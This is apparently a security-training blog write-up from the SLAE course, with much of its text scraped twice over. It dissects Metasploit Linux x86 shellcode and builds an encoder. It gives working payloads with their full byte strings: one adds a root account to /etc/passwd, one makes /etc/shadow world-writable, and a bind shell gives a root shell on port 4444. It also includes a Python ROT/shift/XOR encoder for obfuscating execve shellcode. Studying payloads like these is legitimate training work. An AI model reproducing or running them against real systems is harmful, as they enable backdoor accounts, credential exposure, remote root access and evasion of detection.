hax0r:AzEVb1JCPG1IQ:0:0::/:/bin/sh
root@ubuntu:~#

root@ubuntu:~# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

root@ubuntu:~# ./shellcode

root@ubuntu:~# cat /etc/passwd | grep hax0r

hax0r:AzEVb1JCPG1IQ:0:0::/:/bin/sh

root@ubuntu:~#

Use Ndisasm to dump assembly code

root@ubuntu:~# echo -ne "\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8\x23\x00\x00\x00\x68\x61\x78\x30\x72\x3a\x41\x7a\x45\x56\x62\x31\x4a\x43\x50\x47\x31\x49\x51\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80" | ndisasm -u -
00000000  31C9              xor ecx,ecx
00000002  89CB              mov ebx,ecx
00000004  6A46              push byte +0x46
00000006  58                pop eax
00000007  CD80              int 0x80
00000009  6A05              push byte +0x5
0000000B  58                pop eax
0000000C  31C9              xor ecx,ecx
0000000E  51                push ecx
0000000F  6873737764        push dword 0x64777373
00000014  682F2F7061        push dword 0x61702f2f
00000019  682F657463        push dword 0x6374652f
0000001E  89E3              mov ebx,esp
00000020  41                inc ecx
00000021  B504              mov ch,0x4
00000023  CD80              int 0x80
00000025  93                xchg eax,ebx
00000026  E823000000        call dword 0x4e
0000002B  6861783072        push dword 0x72307861
00000030  3A417A            cmp al,[ecx+0x7a]
00000033  45                inc ebp
00000034  56                push esi
00000035  62                db 0x62
00000036  314A43            xor [edx+0x43],ecx
00000039  50                push eax
0000003A  47                inc edi
0000003B  314951            xor [ecx+0x51],ecx
0000003E  3A30              cmp dh,[eax]
00000040  3A30              cmp dh,[eax]
00000042  3A3A              cmp bh,[edx]
00000044  2F                das
00000045  3A2F              cmp ch,[edi]
00000047  62696E            bound ebp,[ecx+0x6e]
0000004A  2F                das
0000004B  7368              jnc 0xb5
0000004D  0A598B            or bl,[ecx-0x75]
00000050  51                push ecx
00000051  FC                cld
00000052  6A04              push byte +0x4
00000054  58                pop eax
00000055  CD80              int 0x80
00000057  6A01              push byte +0x1
00000059  58                pop eax
0000005A  CD80              int 0x80
root@ubuntu:~#

root@ubuntu:~# echo -ne "\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8\x23\x00\x00\x00\x68\x61\x78\x30\x72\x3a\x41\x7a\x45\x56\x62\x31\x4a\x43\x50\x47\x31\x49\x51\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80" | ndisasm -u -

00000000 31C9 xor ecx,ecx

00000002 89CB mov ebx,ecx

00000004 6A46 push byte +0x46

00000006 58 pop eax

00000007 CD80 int 0x80

00000009 6A05 push byte +0x5

0000000B 58 pop eax

0000000C 31C9 xor ecx,ecx

0000000E 51 push ecx

0000000F 6873737764 push dword 0x64777373

00000014 682F2F7061 push dword 0x61702f2f

00000019 682F657463 push dword 0x6374652f

0000001E 89E3 mov ebx,esp

00000020 41 inc ecx

00000021 B504 mov ch,0x4

00000023 CD80 int 0x80

00000025 93 xchg eax,ebx

00000026 E823000000 call dword 0x4e

0000002B 6861783072 push dword 0x72307861

00000030 3A417A cmp al,[ecx+0x7a]

00000033 45 inc ebp

00000034 56 push esi

00000035 62 db 0x62

00000036 314A43 xor [edx+0x43],ecx

00000039 50 push eax

0000003A 47 inc edi

0000003B 314951 xor [ecx+0x51],ecx

0000003E 3A30 cmp dh,[eax]

00000040 3A30 cmp dh,[eax]

00000042 3A3A cmp bh,[edx]

00000044 2F das

00000045 3A2F cmp ch,[edi]

00000047 62696E bound ebp,[ecx+0x6e]

0000004A 2F das

0000004B 7368 jnc 0xb5

0000004D 0A598B or bl,[ecx-0x75]

00000050 51 push ecx

00000051 FC cld

00000052 6A04 push byte +0x4

00000054 58 pop eax

00000055 CD80 int 0x80

00000057 6A01 push byte +0x1

00000059 58 pop eax

0000005A CD80 int 0x80

root@ubuntu:~#

Analyze code line by line using the comments section

syscall reference setreuid(), open(), write(), exit()

Shellcode II

The second shellcode we’re going to look at is chmod, the following are the options that needs to be feed into the payload

root@ubuntu:~# msfvenom -p linux/x86/chmod --payload-options
Options for payload/linux/x86/chmod:


       Name: Linux Chmod
     Module: payload/linux/x86/chmod
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 36
       Rank: Normal

Provided by:
    kris katterjohn <katterjohn@gmail.com>

Basic options:
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
FILE  /etc/shadow      yes       Filename to chmod
MODE  0666             yes       File mode (octal)

Description:
  Runs chmod on specified file with specified mode

root@ubuntu:~# msfvenom -p linux/x86/chmod --payload-options

Options for payload/linux/x86/chmod:

Name: Linux Chmod

Module: payload/linux/x86/chmod

Platform: Linux

Arch: x86

Needs Admin: No

Total size: 36

Rank: Normal

Provided by:

kris katterjohn <katterjohn@gmail.com>

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

FILE /etc/shadow yes Filename to chmod

MODE 0666 yes File mode (octal)

Description:

Runs chmod on specified file with specified mode

Generating shellcode using default options

root@ubuntu:~# msfvenom -p linux/x86/chmod -f c -v shellcode
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 36 bytes
Final size of c file: 183 bytes
unsigned char shellcode[] = 
"\x99\x6a\x0f\x58\x52\xe8\x0c\x00\x00\x00\x2f\x65\x74\x63\x2f"
"\x73\x68\x61\x64\x6f\x77\x00\x5b\x68\xb6\x01\x00\x00\x59\xcd"
"\x80\x6a\x01\x58\xcd\x80";
root@ubuntu:~#

root@ubuntu:~# msfvenom -p linux/x86/chmod -f c -v shellcode

No platform was selected, choosing Msf::Module::Platform::Linux from the payload

No Arch selected, selecting Arch: x86 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 36 bytes

Final size of c file: 183 bytes

unsigned char shellcode[] =

"\x99\x6a\x0f\x58\x52\xe8\x0c\x00\x00\x00\x2f\x65\x74\x63\x2f"

"\x73\x68\x61\x64\x6f\x77\x00\x5b\x68\xb6\x01\x00\x00\x59\xcd"

"\x80\x6a\x01\x58\xcd\x80";

root@ubuntu:~#

Compile and test

root@ubuntu:~# ls -la /etc/shadow
-rw------- 1 root shadow 1317 Jan 23 09:47 /etc/shadow
root@ubuntu:~# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
root@ubuntu:~# ./shellcode 
root@ubuntu:~# ls -la /etc/shadow
-rw-rw-rw- 1 root shadow 1317 Jan 23 09:47 /etc/shadow
root@ubuntu:~#

root@ubuntu:~# ls -la /etc/shadow

-rw------- 1 root shadow 1317 Jan 23 09:47 /etc/shadow

root@ubuntu:~# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

root@ubuntu:~# ./shellcode

root@ubuntu:~# ls -la /etc/shadow

-rw-rw-rw- 1 root shadow 1317 Jan 23 09:47 /etc/shadow

root@ubuntu:~#

Use GDB with peda to dump assembly code

root@ubuntu:~# gdb -q ./shellcode
Reading symbols from ./shellcode...(no debugging symbols found)...done.
gdb-peda$ set disassembly-flavor intel
gdb-peda$ break *&shellcode
Breakpoint 1 at 0x804a040
gdb-peda$ run
Starting program: /root/shellcode 

[----------------------------------registers-----------------------------------]
EAX: 0x804a040 --> 0x580f6a99 
EBX: 0x0 
ECX: 0xbfffee90 --> 0x1 
EDX: 0xbfffeeb4 --> 0x0 
ESI: 0xb7fb9000 --> 0x1b1db0 
EDI: 0xb7fb9000 --> 0x1b1db0 
EBP: 0xbfffee78 --> 0x0 
ESP: 0xbfffee5c --> 0x80483f8 (<main+29>:	nop)
EIP: 0x804a040 --> 0x580f6a99
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804a03a:	add    BYTE PTR [eax],al
   0x804a03c:	add    BYTE PTR [eax],al
   0x804a03e:	add    BYTE PTR [eax],al
=> 0x804a040 <shellcode>:	cdq    
   0x804a041 <shellcode+1>:	push   0xf
   0x804a043 <shellcode+3>:	pop    eax
   0x804a044 <shellcode+4>:	push   edx
   0x804a045 <shellcode+5>:	call   0x804a056 <shellcode+22>
[------------------------------------stack-------------------------------------]
0000| 0xbfffee5c --> 0x80483f8 (<main+29>:	nop)
0004| 0xbfffee60 --> 0x1 
0008| 0xbfffee64 --> 0xbfffef24 --> 0xbffff120 ("/root/shellcode")
0012| 0xbfffee68 --> 0xbfffef2c --> 0xbffff130 ("XDG_VTNR=7")
0016| 0xbfffee6c --> 0x804a040 --> 0x580f6a99 
0020| 0xbfffee70 --> 0xb7fb93dc --> 0xb7fba1e0 --> 0x0 
0024| 0xbfffee74 --> 0xbfffee90 --> 0x1 
0028| 0xbfffee78 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x0804a040 in shellcode ()
gdb-peda$ disassemble $eip, +35
Dump of assembler code from 0x804a040 to 0x804a063:
=> 0x0804a040 <shellcode+0>:	cdq    
   0x0804a041 <shellcode+1>:	push   0xf
   0x0804a043 <shellcode+3>:	pop    eax
   0x0804a044 <shellcode+4>:	push   edx
   0x0804a045 <shellcode+5>:	call   0x804a056 <shellcode+22>
   0x0804a04a <shellcode+10>:	das    
   0x0804a04b <shellcode+11>:	gs je  0x804a0b1
   0x0804a04e <shellcode+14>:	das    
   0x0804a04f <shellcode+15>:	jae    0x804a0b9
   0x0804a051 <shellcode+17>:	popa   
   0x0804a052 <shellcode+18>:	outs   dx,DWORD PTR fs:[esi]
   0x0804a054 <shellcode+20>:	ja     0x804a056 <shellcode+22>
   0x0804a056 <shellcode+22>:	pop    ebx
   0x0804a057 <shellcode+23>:	push   0x1b6
   0x0804a05c <shellcode+28>:	pop    ecx
   0x0804a05d <shellcode+29>:	int    0x80
   0x0804a05f <shellcode+31>:	push   0x1
   0x0804a061 <shellcode+33>:	pop    eax
   0x0804a062 <shellcode+34>:	int    0x80
End of assembler dump.

root@ubuntu:~# gdb -q ./shellcode

Reading symbols from ./shellcode...(no debugging symbols found)...done.

gdb-peda$ set disassembly-flavor intel

gdb-peda$ break *&shellcode

Breakpoint 1 at 0x804a040

gdb-peda$ run

Starting program: /root/shellcode

[----------------------------------registers-----------------------------------]

EAX: 0x804a040 --> 0x580f6a99

EBX: 0x0

ECX: 0xbfffee90 --> 0x1

EDX: 0xbfffeeb4 --> 0x0

ESI: 0xb7fb9000 --> 0x1b1db0

EDI: 0xb7fb9000 --> 0x1b1db0

EBP: 0xbfffee78 --> 0x0

ESP: 0xbfffee5c --> 0x80483f8 (<main+29>: nop)

EIP: 0x804a040 --> 0x580f6a99

EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)

[-------------------------------------code-------------------------------------]

0x804a03a: add BYTE PTR [eax],al

0x804a03c: add BYTE PTR [eax],al

0x804a03e: add BYTE PTR [eax],al

=> 0x804a040 <shellcode>: cdq

0x804a041 <shellcode+1>: push 0xf

0x804a043 <shellcode+3>: pop eax

0x804a044 <shellcode+4>: push edx

0x804a045 <shellcode+5>: call 0x804a056 <shellcode+22>

[------------------------------------stack-------------------------------------]

0000| 0xbfffee5c --> 0x80483f8 (<main+29>: nop)

0004| 0xbfffee60 --> 0x1

0008| 0xbfffee64 --> 0xbfffef24 --> 0xbffff120 ("/root/shellcode")

0012| 0xbfffee68 --> 0xbfffef2c --> 0xbffff130 ("XDG_VTNR=7")

0016| 0xbfffee6c --> 0x804a040 --> 0x580f6a99

0020| 0xbfffee70 --> 0xb7fb93dc --> 0xb7fba1e0 --> 0x0

0024| 0xbfffee74 --> 0xbfffee90 --> 0x1

0028| 0xbfffee78 --> 0x0

[------------------------------------------------------------------------------]

Legend: code, data, rodata, value

Breakpoint 1, 0x0804a040 in shellcode ()

gdb-peda$ disassemble $eip, +35

Dump of assembler code from 0x804a040 to 0x804a063:

=> 0x0804a040 <shellcode+0>: cdq

0x0804a041 <shellcode+1>: push 0xf

0x0804a043 <shellcode+3>: pop eax

0x0804a044 <shellcode+4>: push edx

0x0804a045 <shellcode+5>: call 0x804a056 <shellcode+22>

0x0804a04a <shellcode+10>: das

0x0804a04b <shellcode+11>: gs je 0x804a0b1

0x0804a04e <shellcode+14>: das

0x0804a04f <shellcode+15>: jae 0x804a0b9

0x0804a051 <shellcode+17>: popa

0x0804a052 <shellcode+18>: outs dx,DWORD PTR fs:[esi]

0x0804a054 <shellcode+20>: ja 0x804a056 <shellcode+22>

0x0804a056 <shellcode+22>: pop ebx

0x0804a057 <shellcode+23>: push 0x1b6

0x0804a05c <shellcode+28>: pop ecx

0x0804a05d <shellcode+29>: int 0x80

0x0804a05f <shellcode+31>: push 0x1

0x0804a061 <shellcode+33>: pop eax

0x0804a062 <shellcode+34>: int 0x80

End of assembler dump.

Analyze code line by line using the comments section

syscall reference chmod() and exit()

Shellcode III

The third and last shellcode we’re going to dissect is shell_bind_tcp, let’s check payload options

root@ubuntu:~# msfvenom -p linux/x86/shell_bind_tcp --payload-options
Options for payload/linux/x86/shell_bind_tcp:


       Name: Linux Command Shell, Bind TCP Inline
     Module: payload/linux/x86/shell_bind_tcp
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 78
       Rank: Normal

Provided by:
    Ramon de C Valle <rcvalle@metasploit.com>

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LPORT  4444             yes       The listen port
RHOST                   no        The target address

Description:
  Listen for a connection and spawn a command shell

root@ubuntu:~# msfvenom -p linux/x86/shell_bind_tcp --payload-options

Options for payload/linux/x86/shell_bind_tcp:

Name: Linux Command Shell, Bind TCP Inline

Module: payload/linux/x86/shell_bind_tcp

Platform: Linux

Arch: x86

Needs Admin: No

Total size: 78

Rank: Normal

Provided by:

Ramon de C Valle <rcvalle@metasploit.com>

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

LPORT 4444 yes The listen port

RHOST no The target address

Description:

Listen for a connection and spawn a command shell

Generating shellcode

root@ubuntu:~# msfvenom -p linux/x86/shell_bind_tcp RHOST=127.0.0.1 -f c -v shellcode
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 78 bytes
Final size of c file: 360 bytes
unsigned char shellcode[] = 
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
root@ubuntu:~#

root@ubuntu:~# msfvenom -p linux/x86/shell_bind_tcp RHOST=127.0.0.1 -f c -v shellcode

No platform was selected, choosing Msf::Module::Platform::Linux from the payload

No Arch selected, selecting Arch: x86 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 78 bytes

Final size of c file: 360 bytes

unsigned char shellcode[] =

"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"

"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"

"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"

"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"

"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"

"\x0b\xcd\x80";

root@ubuntu:~#

Compile and test

root@ubuntu:~# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
root@ubuntu:~# ./shellcode 
^Z
[2]+  Stopped                 ./shellcode
root@ubuntu:~# bg
[2]+ ./shellcode &
root@ubuntu:~# nc -nv 127.0.0.1 4444
Connection to 127.0.0.1 4444 port [tcp/*] succeeded!
id
uid=0(root) gid=0(root) groups=0(root)

root@ubuntu:~# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

root@ubuntu:~# ./shellcode

[2]+ Stopped ./shellcode

root@ubuntu:~# bg

[2]+ ./shellcode &

root@ubuntu:~# nc -nv 127.0.0.1 4444

Connection to 127.0.0.1 4444 port [tcp/*] succeeded!

uid=0(root) gid=0(root) groups=0(root)

Use libemu to dump assembly code

root@ubuntu:~# msfvenom -p linux/x86/shell_bind_tcp RHOST=127.0.0.1 -f raw | sctest -S -s 100000 -vvv
verbose = 3
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 78 bytes
*
s
n
i
p
*
int socket (
     int domain = 2;
     int type = 1;
     int protocol = 0;
) =  14;
int bind (
     int sockfd = 14;
     struct sockaddr_in * my_addr = 0x00416fc2 => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 23569 (port=4444);
             struct in_addr sin_addr = {
                 unsigned long s_addr = 0 (host=0.0.0.0);
             };
             char sin_zero = "       ";
         };
     int addrlen = 16;
) =  0;
int listen (
     int s = 14;
     int backlog = 0;
) =  0;
int accept (
     int sockfd = 14;
     sockaddr_in * addr = 0x00000000 => 
         none;
     int addrlen = 0x00000010 => 
         none;
) =  19;
int dup2 (
     int oldfd = 19;
     int newfd = 14;
) =  14;
int dup2 (
     int oldfd = 19;
     int newfd = 13;
) =  13;
int dup2 (
     int oldfd = 19;
     int newfd = 12;
) =  12;
int dup2 (
     int oldfd = 19;
     int newfd = 11;
) =  11;
int dup2 (
     int oldfd = 19;
     int newfd = 10;
) =  10;
int dup2 (
     int oldfd = 19;
     int newfd = 9;
) =  9;
int dup2 (
     int oldfd = 19;
     int newfd = 8;
) =  8;
int dup2 (
     int oldfd = 19;
     int newfd = 7;
) =  7;
int dup2 (
     int oldfd = 19;
     int newfd = 6;
) =  6;
int dup2 (
     int oldfd = 19;
     int newfd = 5;
) =  5;
int dup2 (
     int oldfd = 19;
     int newfd = 4;
) =  4;
int dup2 (
     int oldfd = 19;
     int newfd = 3;
) =  3;
int dup2 (
     int oldfd = 19;
     int newfd = 2;
) =  2;
int dup2 (
     int oldfd = 19;
     int newfd = 1;
) =  1;
int dup2 (
     int oldfd = 19;
     int newfd = 0;
) =  0;
int execve (
     const char * dateiname = 0x00416fb2 => 
           = "/bin//sh";
     const char * argv[] = [
           = 0x00416faa => 
               = 0x00416fb2 => 
                   = "/bin//sh";
           = 0x00000000 => 
             none;
     ];
     const char * envp[] = 0x00000000 => 
         none;
) =  0;

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

root@ubuntu:~# msfvenom -p linux/x86/shell_bind_tcp RHOST=127.0.0.1 -f raw | sctest -S -s 100000 -vvv

verbose = 3

No platform was selected, choosing Msf::Module::Platform::Linux from the payload

No Arch selected, selecting Arch: x86 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 78 bytes

int socket (

int domain = 2;

int type = 1;

int protocol = 0;

) = 14;

int bind (

int sockfd = 14;

struct sockaddr_in * my_addr = 0x00416fc2 =>

struct = {

short sin_family = 2;

unsigned short sin_port = 23569 (port=4444);

struct in_addr sin_addr = {

unsigned long s_addr = 0 (host=0.0.0.0);

};

char sin_zero = " ";

};

int addrlen = 16;

) = 0;

int listen (

int s = 14;

int backlog = 0;

) = 0;

int accept (

int sockfd = 14;

sockaddr_in * addr = 0x00000000 =>

none;

int addrlen = 0x00000010 =>

none;

) = 19;

int dup2 (

int oldfd = 19;

int newfd = 14;

) = 14;

int dup2 (

int oldfd = 19;

int newfd = 13;

) = 13;

int dup2 (

int oldfd = 19;

int newfd = 12;

) = 12;

int dup2 (

int oldfd = 19;

int newfd = 11;

) = 11;

int dup2 (

int oldfd = 19;

int newfd = 10;

) = 10;

int dup2 (

int oldfd = 19;

int newfd = 9;

) = 9;

int dup2 (

int oldfd = 19;

int newfd = 8;

) = 8;

int dup2 (

int oldfd = 19;

int newfd = 7;

) = 7;

int dup2 (

int oldfd = 19;

int newfd = 6;

) = 6;

int dup2 (

int oldfd = 19;

int newfd = 5;

) = 5;

int dup2 (

int oldfd = 19;

int newfd = 4;

) = 4;

int dup2 (

int oldfd = 19;

int newfd = 3;

) = 3;

int dup2 (

int oldfd = 19;

int newfd = 2;

) = 2;

int dup2 (

int oldfd = 19;

int newfd = 1;

) = 1;

int dup2 (

int oldfd = 19;

int newfd = 0;

) = 0;

int execve (

const char * dateiname = 0x00416fb2 =>

= "/bin//sh";

const char * argv[] = [

= 0x00416faa =>

= 0x00416fb2 =>

= "/bin//sh";

= 0x00000000 =>

none;

];

const char * envp[] = 0x00000000 =>

none;

) = 0;

Analyze code line by line using the comments section

syscall reference socketcall(), dup2(), and execute()

Closing Thoughts

Stepping through msfvenom shellcode taught me few behind the scene tricks, also it cleared my doubts as far as how some of the commands work. Hope you learned something too! Feel free to contact me for questions using the comment section below or just tweet me @ihack4falafel .

This blog post has been created for completing the requirements of the SecurityTube Linux
Assembly Expert certification:

http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-1115

Github Repo: https://github.com/ihack4falafel/SLAE32/tree/master/Assignment%2015

[ROT-N + Shift-N + XOR-N] Shellcode Encoder | Linux x86

Introduction

According to English dictionary, encode is converting something, such as a body of information from one system of communications to another; especially: to convert a message into code. This blog post will combine three basic encoding operations (more on that later) to encode sample shellcode and then decode/execute it to demonstrate the concept.

Encoder

In this section, we’ll create 3-phase encoder that takes one byte of given shellcode at a time, mangle it and then produce an encoded word (2 bytes). The following will describe what each phase will do. Phase I (ROT-N), in this phase we add number N to shellcode byte. Phase II (Shift-N), in this phase we shift stdout from phase one to left by N. Phase III (XOR-N), here we just XOR stdout from phase two to get the final encoded word. Before we start working on the encoder, let’s write shellcode that spawn shell to test with.

global _start			

section .text

_start:
    ;
    ; execve() code block
    ;
    xor eax,eax       ; initiliaze EAX
    push eax          ; push null terminator
    push 0x68732f2f   ; push /bin//sh
    push 0x6e69622f
    xchg ebx,esp      ; save stack pointer to EBX
    mov al,0xb        ; __NR_execve 11
    int 0x80          ; ping kernel!

global _start

section .text

_start:

;

; execve() code block

;

xor eax,eax ; initiliaze EAX

push eax ; push null terminator

push 0x68732f2f ; push /bin//sh

push 0x6e69622f

xchg ebx,esp ; save stack pointer to EBX

mov al,0xb ; __NR_execve 11

int 0x80 ; ping kernel!

Let’s compile execve() code block and then dump shellcode

ihack4falafel@ubuntu:~$ nasm -f elf32 -o sh.o sh.nasm 
ihack4falafel@ubuntu:~$ ld -z execstack -o sh sh.o
ihack4falafel@ubuntu:~$ objdump -d ./sh|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xdc\xb0\x0b\xcd\x80"
ihack4falafel@ubuntu:~$

ihack4falafel@ubuntu:~$ nasm -f elf32 -o sh.o sh.nasm

ihack4falafel@ubuntu:~$ ld -z execstack -o sh sh.o

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xdc\xb0\x0b\xcd\x80"

ihack4falafel@ubuntu:~$

We’ll create python script that takes ROT, Shift, and XOR as user input and print original and encoded shellcode, please note you still need to change shellcode inside the script to your liking. For this post, we’ll use the one created earlier. It’s worth noting that the script shift operation number can only be anything between 1 and 8 bits due to encoded_shellcode size (word) in the decoder. Also, we’ve added XOR input value to the end of the encoded shellcode as terminator, so if XOR operation in the decoder results in zero that means hey stop decoding.

#!/usr/bin/python
#---------------------------------------------------------------------------------------------#
# Script        = Encoder.py                                                                  #
# SLAE-ID       = SLAE-1115                                                                   #
# Description   = [ROT-N + SHL-N + XOR-N] Encoder                                             #
# Date          = 1/19/2018                                                                   #
# Author        = @ihack4falafel                                                              #
# Usage         = python Encoder.py <ROT number> <number of bits to shift> <XOR number>       #
#---------------------------------------------------------------------------------------------#

import sys

# Colors 
#---------------#---------#
W  = '\033[0m'  # White   #
P  = '\033[35m' # Purple  #
Y  = '\033[33m' # Yellow  #
#---------------#---------#

# Check ROT, SHL, and XOR input, otherwise print usage, example, and important notes!
if len(sys.argv) < 4:
  print Y+ "Usage               :" + P+  " python Encoder.py <ROT number> <number of bits to shift> <XOR number>  " +W
  print Y+ "Example             :" + P+  " python Encoder.py 13 1 1337                                            " +W
  print Y+ "Notes               :" + P+  " 1) Make sure to update Decoder.nasm with input values.                 " +W
  print    "                     " + P+  " 2) Due to encoded_shellcode size (word) in Decoder.nasm, shift operatio" +W
  print    "                     " + P+  "    n is limited to <1-8> bits. Feel free to upgrade size to DW to allow" +W
  print    "                     " + P+  "    up to 16-bits shift operation.                                      " +W
  print    "                     " + P+  " 3) Encoder.py currently include /bin/sh shellcode as proof of concept. " +W
  print    "                     " + P+  "    Make sure to change it to your desired shellcode.                   " +W
  sys.exit(0)

ROT     = int(sys.argv[1])
nbits   = int(sys.argv[2])
XOR     = int(sys.argv[3])

# initial values   
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xdc\xb0\x0b\xcd\x80")           # paste your shellcode here
XOR_HEX = hex(XOR)                                                                                     # Encoded shellcode terminator     
encoded_shellcode  = "" 
original_shellcode = ""

# Orginal shellcode formatted
for x in bytearray(shellcode):
  original_shellcode += '0x'
  original_shellcode += '%02x, ' %x

# [ROT-N + SHL-N + XOR-N] encoded shellcode formatted   
for y in bytearray(shellcode):  
  byte = (y + ROT)%256                                                                                  #|-->ROT-N               
  byte = byte << nbits                                                                                  #########|-->SHL-N
  byte = byte ^ XOR                                                                                     #################|-->XOR-N	                                                                                  
  encoded_shellcode += '0x'
  encoded_shellcode += '%02x, ' %byte

# print original and encoded shellcode
print Y+ "Original Shellcode: " + P+ original_shellcode              +W
print Y+ "Encoded Shellcode : " + P+ encoded_shellcode  + Y+ XOR_HEX +W

#!/usr/bin/python

#---------------------------------------------------------------------------------------------#

# Script = Encoder.py #

# SLAE-ID = SLAE-1115 #

# Description = [ROT-N + SHL-N + XOR-N] Encoder #

# Date = 1/19/2018 #

# Author = @ihack4falafel #

# Usage = python Encoder.py <ROT number> <number of bits to shift> <XOR number> #

#---------------------------------------------------------------------------------------------#

import sys

# Colors

#---------------#---------#

W = '\033[0m' # White #

P = '\033[35m' # Purple #

Y = '\033[33m' # Yellow #

#---------------#---------#

# Check ROT, SHL, and XOR input, otherwise print usage, example, and important notes!

if len(sys.argv) < 4:

print Y+ "Usage :" + P+ " python Encoder.py <ROT number> <number of bits to shift> <XOR number> " +W

print Y+ "Example :" + P+ " python Encoder.py 13 1 1337 " +W

print Y+ "Notes :" + P+ " 1) Make sure to update Decoder.nasm with input values. " +W

print " " + P+ " 2) Due to encoded_shellcode size (word) in Decoder.nasm, shift operatio" +W

print " " + P+ " n is limited to <1-8> bits. Feel free to upgrade size to DW to allow" +W

print " " + P+ " up to 16-bits shift operation. " +W

print " " + P+ " 3) Encoder.py currently include /bin/sh shellcode as proof of concept. " +W

print " " + P+ " Make sure to change it to your desired shellcode. " +W

sys.exit(0)

ROT = int(sys.argv[1])

nbits = int(sys.argv[2])

XOR = int(sys.argv[3])

# initial values

shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xdc\xb0\x0b\xcd\x80") # paste your shellcode here

XOR_HEX = hex(XOR) # Encoded shellcode terminator

encoded_shellcode = ""

original_shellcode = ""

# Orginal shellcode formatted

for x in bytearray(shellcode):

original_shellcode += '0x'

original_shellcode += '%02x, ' %x

# [ROT-N + SHL-N + XOR-N] encoded shellcode formatted

for y in bytearray(shellcode):

byte = (y + ROT)%256 #|-->ROT-N

byte = byte << nbits #########|-->SHL-N

byte = byte ^ XOR #################|-->XOR-N

encoded_shellcode += '0x'

encoded_shellcode += '%02x, ' %byte

# print original and encoded shellcode

print Y+ "Original Shellcode: " + P+ original_shellcode +W

print Y+ "Encoded Shellcode : " + P+ encoded_shellcode + Y+ XOR_HEX +W

Generate encoded shellcode

ihack4falafel@ubuntu:~$ python Encoder.py 13 1 1337
Original Shellcode: 0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x87, 0xdc, 0xb0, 0x0b, 0xcd, 0x80, 
Encoded Shellcode : 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539
ihack4falafel@ubuntu:~$

ihack4falafel@ubuntu:~$ python Encoder.py 13 1 1337

